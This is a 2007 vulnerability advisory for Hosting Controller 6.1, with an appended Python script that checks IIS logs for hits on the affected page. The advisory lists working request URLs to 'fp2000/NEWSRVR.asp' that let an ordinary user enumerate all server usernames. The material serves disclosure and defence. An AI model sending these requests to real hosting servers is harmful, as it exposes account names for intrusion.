Title: Users can see all usernames in the server by "fp2000/NEWSRVR.asp".
Vendor: Hosting Controller
Version: 6.1 Hot fix <= 3.3
Vendor URL: www.hostingcontroller.com
Solution: N/A
Release Date: 2007 - December
Credit: BugReport.IR
####################
- Discussion:
####################
10- [User] can see all usernames in the server by "fp2000/NEWSRVR.asp".
10.1- Some exploits are:
http://[HC URL]/fp2000/NEWSRVR.asp?AdminName=OWNERNAME&AdminLevel=reseller
http://[HC URL]/fp2000/NEWSRVR.asp?AdminName=hcadmin&AdminLevel=host
And for all usernames: http://[HC URL]/fp2000/NEWSRVR.asp?AdminName=&AdminLevel=
[User] = (A user with a simple account.)
####################
- Solution:
####################
Unfortunately, there is no support from Hosting Controller for these bugs. Also, they told us that there is no more support for HC 6.1.
Fast Solution:
Delete or rename the following file, which is in "Hosting Controller\web\admin\":
- "/fp2000/NEWSRVR.asp"
Also, you can contact "admin[4t}bugreport{d0t]ir" to fix all these bugs for you without changing or deleting any file if you want.
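Before removing the file, it is worth checking whether the page has already been requested. The script below is an added example, not part of the original advisory or of Hosting Controller: it scans IIS W3C extended log lines for requests to "fp2000/NEWSRVR.asp" and flags the empty-AdminName form described above. It assumes the site logs cs-uri-stem and cs-uri-query; the function name and the sample log lines are constructed for illustration.

```python
# Added example (not from the advisory): find requests to fp2000/NEWSRVR.asp
# in IIS W3C extended logs. The log layout and sample lines are assumptions.
from urllib.parse import parse_qs

TARGET = "/fp2000/newsrvr.asp"  # path from the advisory, compared case-insensitively

def find_newsrvr_requests(lines):
    """Return one dict per logged request to NEWSRVR.asp (columns located via #Fields)."""
    fields, hits = [], []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if not row.get("cs-uri-stem", "").lower().endswith(TARGET):
            continue
        query = row.get("cs-uri-query", "-")  # IIS writes "-" for an empty query
        params = parse_qs("" if query == "-" else query, keep_blank_values=True)
        params = {k.lower(): v[0] for k, v in params.items()}
        name = params.get("adminname")
        hits.append({
            "when": f'{row.get("date", "?")} {row.get("time", "?")}',
            "client": row.get("c-ip", "?"),
            "status": row.get("sc-status", "?"),
            "admin_name": name,
            "admin_level": params.get("adminlevel"),
            # An empty AdminName is the form the advisory says lists all usernames.
            "lists_all_users": name == "",
        })
    return hits

# Constructed sample log (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
#Version: 1.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2007-12-10 09:14:02 GET /fp2000/NEWSRVR.asp AdminName=hcadmin&AdminLevel=host 192.0.2.10 200
2007-12-10 09:14:30 GET /fp2000/newsrvr.asp AdminName=&AdminLevel= 192.0.2.10 200
2007-12-10 09:15:11 GET /default.asp - 198.51.100.7 200
2007-12-11 17:40:45 GET /fp2000/NEWSRVR.asp - 203.0.113.5 404
"""

if __name__ == "__main__":
    for hit in find_newsrvr_requests(SAMPLE_LOG.splitlines()):
        print(hit)
```

Hits with status 200 from ordinary user accounts are the ones to review; after the file is deleted or renamed, later requests should appear with status 404.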
####################
- Credit :
####################
AmnPardaz Security Research Team - www.Bugreport.ir
Contact: admin[4t}bugreport{d0t]ir